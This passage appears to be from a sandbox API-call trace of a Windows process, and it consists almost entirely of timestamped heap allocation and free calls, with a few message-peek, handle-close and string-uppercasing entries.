hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.785] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0265.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0265.785] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.786] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0265.786] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.787] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.787] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0265.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.788] FreeLibrary (hLibModule=0x74d40000) returned 1 [0265.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.788] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.788] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.788] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0265.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0265.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0265.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0265.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0265.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0265.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.790] CloseHandle (hObject=0x294) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.791] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0265.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0265.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0265.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0265.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.792] CloseHandle (hObject=0x2d0) returned 1 [0265.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0265.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.799] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0265.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0265.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0265.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0265.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0265.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0265.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0265.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0265.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0265.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0265.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0265.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0265.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34f9510 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0265.805] HeapFree (in: hHeap=0x25c0000, 